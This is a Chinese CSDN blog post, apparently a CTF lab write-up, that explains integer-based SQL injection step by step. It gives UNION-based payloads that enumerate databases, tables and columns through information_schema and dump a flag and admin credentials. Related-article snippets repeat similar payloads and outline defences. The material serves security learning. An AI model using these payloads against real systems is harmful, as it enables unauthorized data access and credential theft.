web安全学习-------2.sql整数型注入

最新推荐文章于 2025-09-26 14:56:42 发布
原创 最新推荐文章于 2025-09-26 14:56:42 发布 · 406 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #数据库 #安全 #web service

本文详细介绍了一次整数型SQL注入攻击的过程,包括确定数据列数、联合查询、暴库名、爆表名、爆列名及获取数据的具体步骤。通过实际案例,展示了如何利用SQL注入漏洞获取目标数据库信息。

在这里插入图片描述
这是作者遇到的一个题目,当然这个题目也很直白,整数型注入。
我们一次填入1,2,3会发现只有1和2有回显,3并没有回显。说明可以查询到的数据有两个。在这里插入图片描述
在这里插入图片描述
接着我们测试一下数据有几列:

测试列数:
GET:id=1 order by 3#
POST:id=1’ order by 3#
在这里插入图片描述
我们可以看到3并没有回显,2的时候正常显示,所以数据一共两列。

接下来就是尝试联合查询了,记得把前面的查询数据置空,写成id=0即可,显示正常,说明确确实实存在这两列数据 。在这里插入图片描述
接下来就是一些套路操作了:

  1. 暴库名
  2. 爆表名
  3. 爆列名
  4. 获取数据

就酱都是大同小异,输入的sql语句也有格式可寻:

1.暴库名:
id=0 union select 1,database()#
这里select user(),version()还可有求出数据库的用户和数据库的版本,当然我们这里是不需要的。
在这里插入图片描述
sqli即是我们所求的数据库名。

2.爆表名
我们就要根据sqli去求出这个表名
id=0 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
在这里插入图片描述
flag即是我们所要求的表名,接下来我们就是要通过flag求出列名。

3.爆列名
id=0 union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘flag’
在这里插入图片描述
这里一定一定要注意在输入sql语句是是英文字符状态,我在这里因为是中文状态卡了好一会。

4.获取数据
我们已经将数据的列名flag得到,那么接下来就是通过表名和列名来求到flag。
id=0 union select 1,flag from flag
在这里插入图片描述
id和=是连在一起的,否则也是无法得到结果的。

最后关于手工注入的补充一点知识:

mysql中的information_schema 结构用来存储数据库系统信息
information_schema 结构中这几个表存储的信息,在注入中可以用到的几个表。

SCHEMATA 存储数据库名的,
关键字段:SCHEMA_NAME,表示数据库名称
TABLES 存储表名的
关键字段:TABLE_SCHEMA表示表所属的数据库名称;
TABLE_NAME表示表的名称
COLUMNS 存储字段名的
关键字段:TABLE_SCHEMA表示表所属的数据库名称;
TABLE_NAME表示所属的表的名称
COLUMN_NAME表示字段名

爆所有数据名
select group_concat(SCHEMA_NAME) from information_schema.schemata
得到当前库的所有表
select group_concat(table_name) from information_schema.tables where table_schema=database()
得到表中的字段名 将敏感的表进行16进制编码adminuser=0x61646D696E75736572
select group_concat(column_name) from information_schema.columns where table_name=0x61646D696E75736572
得到字段具体的值 select group_concat(username,0x3a,password) from adminuser

sql注入整数型注入
2401_82760239的博客
03-29 1512
SQL注入是一种非常常见的数据库攻击手段,SQL注入漏洞也是网络世界中最普遍的漏洞之一。SQL注入其实就是恶意用户通过在表单中填写包含SQL关键字的数据来使数据库执行非常规代码的过程。简单来说,就是数据「越俎代庖」做了代码才能干的事情。这个问题的来源是,SQL数据库的操作是通过SQL语句来执行的,而无论是执行代码还是数据项都必须写在SQL语句之中,这就导致如果我们在数据项中加入了某些SQL语句关键字(比如说SELECT、DROP等等),这些关键字就很可能在数据库写入或读取数据时得到执行。
②基于整型的SQL注入
熊俊坤的博客
10-25 4745
基于整型的SQL注入
SQL 三种注入方式,一文详解!
最新发布
Cairo_A的博客
09-26 1229
SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。
CTFHub_SQL整数型注入(超详解)
weixin_47443077的博客
07-26 1422
CTFHub_SQL整数型注入(超详解) 相信这个过程会帮助你理解sql注入! 首先打开环境 先尝试手注,已经说明是整数型,就直接查看字段数: -1 order by 1# -1 order by 2# -1 order by 3# 发现在第三步的时候没有回显,说明字段数是2。 接着判断显示位: -1 union select 1,2# 然后查看数据库-1 union select database(),2# 接着获取sqli数据库中的表: -1 union select 1,grou
SQL注入整数型注入
noob_3000的博客
08-07 3294
CTFHUB整数型SQL注入
SQL 整数形注入
MZa1213123的博客
03-02 2799
CTFHub SQL 整数型注入 先 and 1=1 有回显 接着 and 1=2 无回显也就错误页面 判断有 SQL 注入 order by x 爆出几个字段 order by 3 无回显 证明只有两个字段 union 联合查询 常用函数 user() database() session_usr() @@version @@basedir @@datadir @@version_compile_os 得到数据库名后 接着继续爆出该数据库的表名(奇怪.
CTFHUB-技能树-WEB-SQL注入
慢就是快
04-16 646
文章目录1.整数型注入2.字符型注入3.报错注入4.布尔注入5.时间盲注5.MYSQL结构6.Cookie 注入7.UA注入8.Referer注入9.过滤空格 1.整数型注入 ?id=-1 order by 2 --+ true # 两个字段 ?id=-1 order by 3 --+ false ?id=-1 union select 1,2 --+ --+ #说明存在两个显示位置,id=-1是为了将显示位置腾空,方便回显数据显示 id=-1 union select 1,group_concat(s
07.SQL注入-上(超详细!!!)
m0_72760503的博客
07-31 1575
报错注入(Error-Based SQL Injection)是一种SQL注入技术,它依赖于数据库在遇到错误时返回的错误信息。攻击者通过构造特定的SQL语句,触发数据库执行这些语句时产生错误,然后从错误信息中提取数据库结构、权限信息或其他敏感数据。
2024年最全网络安全-SQL注入原理、攻击及防御
2401_84300128的博客
05-01 732
0x7e是~,使用char(126)也是一样的,concat()函数是将其连成一个字符串,因此不会符合XPATH_string的格式,从而出现格式错误,爆出sql语句运行后的结果。当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。
ctfshow web sql注入 web242--web249
2301_81040377的博客
07-03 657
mid和limit都行,我比较喜欢用mid。用这两个替换floor这个向下取整函数。into outfile 的使用。用.user.ini包含。
CTFHUB-WEB-SQL注入
K_ShenH的博客
06-09 1439
CTFHUB-WEB-SQL注入
sql整型注入
haishiqiguai的博客,欢迎你的到来,希望你能在此找到汝心中所求
04-11 793
本文围绕 SQL 整形注入展开,详细介绍了相关重要概念、判断方法及示例操作
整数型SQL注入
qq_69100706的博客
07-29 428
在CTF(Capture The Flag)竞赛中,整数型SQL注入是一种常见的挑战类型,尤其是在Web安全类的任务中。整数型注入发生在应用程序接受数字输入时,没有正确地验证或清理输入数据,导致恶意构造的数字可以被解释为SQL语句的一部分,从而执行额外的数据库查询。
sql整数型/字符型 注入
qq_44985415的博客
08-29 1603
整数型注入 1.检查是否存在注入 and 1=1 返回正确 and 1=2 返回错误 2.猜出字段数 order by x(数字) 得出字段数 3.然后就是爆数据库名information schema三步 ?id=1 and 1=2 union select 1,database() 得到数据库名称sqli 4.爆表名 ?id=1 and 1=2 union select 1,group_concat(table_name) from information_schema.tables where
CTFHUB - SQL注入-整数型和字符型注入
m0_64180167的博客
11-28 2968
对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的。,在管理员不知情的情况下实现非法操作,以此来实现欺骗。执行非授权的任意查询,从而进一步得到相应的数据信息。在学习SQL注入时要了解一些MYSQL语法。
SQL注入的使用(整型注入)
2402_87768817的博客
03-01 1719
‌整型注入‌:攻击者通过在应用程序的输入参数中使用整数类型的数据进行SQL注入攻击
CTFHub技能书解题笔记-SQL注入-整数型注入
qq_43006864的博客
12-21 2843
一、到了SQL注入了,这里的话,我建议大家手动注入,要是不熟悉sqlmap的话,建议分别做一遍,这里我附上手动注入的方式。 打开题目 很清楚的告诉我们,整数型注入,还告诉我们输个1试试。 看红字部分。噢哟,直接sql语句都出来了, 这个语句很简单了,大家有sql基础的都看得懂, 然后清晰了。 常规做法,下一步恒真式,and 1=1,冲! 有回显,存在注入点了。他并没有加引号,这里也不需要加--+ # 之类的,直接进行注入就行了。 我习惯再url上进行操作,大家也可以再输入框操
sql初学实践1)SQL 整数型注入--wp
m0_64417923的博客
05-03 754
进入环境: 只有输入1和2有回显 接着,判断列数: 依次输入 id=1 order by 1 id=1 order by 2 id=1 order by 3 到3时,没有回显,报错,说明这时表格只有两列 下一步 取得数据库名称: 1 and 0 union select 1,database() s数据库名称为sqli 下一步 爆表名 -1 union select 1,group_concat(table_name) from informa...
常规SQL注入(整型注入
hxhabcd123的博客
08-29 1636
常规SQL注入(整型注入
buu入门]SQL注入-2
03-19
### SQL注入基础知识 SQL注入是一种常见的网络安全漏洞,允许攻击者通过向应用程序提交恶意SQL语句来操纵数据库操作。这种攻击利用了程序未能正确处理用户输入的情况,从而可能造成敏感数据泄露、数据损坏或其他严重后果[^1]。 #### 攻击原理 SQL注入的核心在于攻击者能够通过特定字符(如单引号 `'` 或双引号 `"`),修改原始SQL查询的结构并执行未经授权的操作。例如,在登录表单中输入用户名为 `admin' --` 可能会关闭后续的部分SQL语法,导致非法访问成功[^2]。 --- ### 防御方法概述 针对SQL注入的风险,可以通过多种技术手段加以防范: #### 参数化查询 参数化查询是预防SQL注入最有效的方法之一。它强制区分SQL代码与动态传入的数据部分,即使输入包含危险字符也不会影响原有查询逻辑。以下是Python中的一个例子使用SQLite库实现参数绑定: ```python import sqlite3 conn = sqlite3.connect('example.db') cursor = conn.cursor() # 安全的方式传递变量给SQL命令 username = 'test_user' password = 'secure_password' query = "SELECT * FROM users WHERE username=? AND password=?" cursor.execute(query, (username, password)) results = cursor.fetchall() print(results) conn.close() ``` 上述代码片段展示了如何借助占位符(`?`)代替直接拼接字符串构建最终SQL指令,避免潜在风险。 #### 输入验证 除了采用参数化外,还应该实施严格的输入校验机制。这不仅限于简单的长度限制或者正则表达式匹配,还需要考虑业务场景下的合理性判断。比如对于电子邮件地址字段,则需确认其格式是否符合标准RFC规范;而对于整数型ID值,则要确保只接受纯数字形式。 #### 使用ORM框架 对象关系映射(Object Relational Mapping) 技术简化了开发者编写复杂SQL的过程,并内置了许多安全性保障措施。像Django ORM或Hibernate这样的高级抽象层自动实现了必要的转义功能,减少了手动犯错的机会[^3]。 #### Web应用防火墙(WAF) 部署WAF作为额外防线也是明智之举。这些设备位于客户端请求到达实际服务器之前的位置上,能够识别已知模式特征的可疑流量并将之拦截下来。然而需要注意的是,尽管它们提供了即时保护作用,但并不能完全替代良好的编程习惯和全面测试流程。 --- ### 工具推荐 为了更高效地定位可能存在隐患的地方,可以引入专门设计用来评估网站是否存在此类弱点的应用软件包。下面列举了几款流行的选择供参考: - **sqlmap**: 开源自动化渗透测试工具,支持大量自定义选项以便深入探索目标环境内的每一个角落。 - **Burp Suite Professional**: 商业版提供强大的代理监听能力配合手动作业完成更加精细粒度上的分析工作。 - **Nessus / OpenVAS**: 综合性漏洞管理解决方案的一部分,覆盖范围广泛不仅仅局限于单一类型的威胁类别。 ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值